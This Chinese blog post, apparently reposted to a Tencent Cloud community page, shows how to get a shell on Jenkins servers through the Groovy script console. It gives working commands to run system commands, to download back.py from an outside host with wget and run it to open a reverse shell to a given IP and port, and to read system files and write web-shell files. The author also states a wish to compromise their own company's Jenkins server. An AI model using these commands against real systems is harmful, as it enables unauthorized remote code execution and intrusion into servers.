Jenkins拿shell方法

最近一直在学习怎么利用jenkins反序列化,妹的,就是没有一个顺手的GUI工具,能让我直接秒杀服务器。

楼下的小伙伴有好的工具,请给我留言,我要秒了我们公司的jenkins服务器,多谢。。。。

关于反序列化的问题,如果不懂java就是苦逼,小弟我就是这样的苦逼,这个先放一边,先把jenkins拿shell的方法整理一下。

文章来自安全脉搏,略有改动,更加精简。。。

一、Jenkins未授权访问可执行命令

命令执行的话,是需要有相关用户权限的,具体的位置在下图中:

在脚本命令行中输入下面的语句,即可执行相应的命令:

1

println "ipconfig /all".execute().text

推荐上面的这种方式,比较简洁。。

1

def sout = new StringBuffer(), serr = new StringBuffer()

2

def proc = 'ipconfig'.execute()

3

proc.consumeProcessOutput(sout, serr)

4

proc.waitForOrKill(1000)

5

println "out> $sout err> $serr"

老外的方式,比较正式一点。。

下面的截图是执行后的结果,就像在CMD中执行是一样的效果。

二、Jenkins拿shell方法

1、直接wget下载back.py反弹shell,如下:

1

println "wget http://www.waitalone.cn/tools/back.py -P /tmp/".execute().text

2

println "python /tmp/back.py 10.1.1.111 8080".execute().text

2、多种方式写shell

01

Groovy I/O 文件读写

02

03

读文件

04

new File("/tmp/back.py").getText();

05

new File("c:/windows/win.ini").getText();

06

07

//eachLine -- 打开和读取文件的每一行

08

new File("/tmp/back.py").eachLine {

09

println it;

10

}

11

12

//readLines

13

lineList = new File("/tmp/back.py").readLines();

14

lineList.each {

15

println it.toUpperCase();

16

}

17

18

write轻轻松松写文件

19

new File("/tmp/1.php").write('Hello SecPulse');

20

21

多行写入

22

new File("/tmp/1.php").write("""

23

This is

24

just a test file

25

to play with

26

""");

添加收藏

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏黑白安全

DHCP攻击的实施与防御

DHCP攻击针对的目标是网络中的DHCP服务器,原理是耗尽DHCP服务器所有的IP地址资源,使其无法正常提供地址分配服务。然后在网络中再架设假冒的DHCP服务器...

5374
来自专栏Hadoop实操

Hue中使用Oozie创建Ssh工作流时sudo命令执行失败问题分析

在使用Hue创建Ssh的Oozie工作流,在Shell脚本中执行sudo命令失败,异常如下:

4535
来自专栏小白课代表

Windows 10 让人不爽的骚操作之二!

有没有一丝丝的别扭?倒不是嫌弃这几个文件夹不好看或者不好用,单单这7个文件夹就让人受不了好叭(╯▽╰)

2803
来自专栏皮皮之路

【Spring】Spring boot多数据源历险记

3866
来自专栏YouMeek

Gradle 安装 + 配置 + 构建大型项目(CAS)

Gradle 安装(Windows) 官网下载:https://services.gradle.org/distributions/ 然后找这类文件命名格式:...

6798
来自专栏腾讯移动品质中心TMQ的专栏

当 Espresso 遇见 Android 单元测试

如果依赖 Android 环境,但是没有 UI 相关的单元测试可以使用开源库 Robolectric 解决依赖问题,使测试运行在 JVM 上,大大提高测试运行效...

3431
来自专栏owent

注册表常用键值意义

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]

1512
来自专栏IT杂记

CentOS6配置odbc访问Oracle

2120
来自专栏琯琯博客

laravel 5.4 + dingo api + jwt 代替 Passport

新装一个LV composer create-project --prefer-dist laravel/laravel myApiProject 安装ding...

3828
来自专栏bboysoul

开源堡垒机jumpserver搭建

之前说了国产良心kodexplorer,今天再说一个国内比较好的开源项目jumpserver,除此之外还可以的国内开源项目我觉得就是宝塔面板了。废话不多说上教程...

6643

扫码关注云+社区

领取腾讯云代金券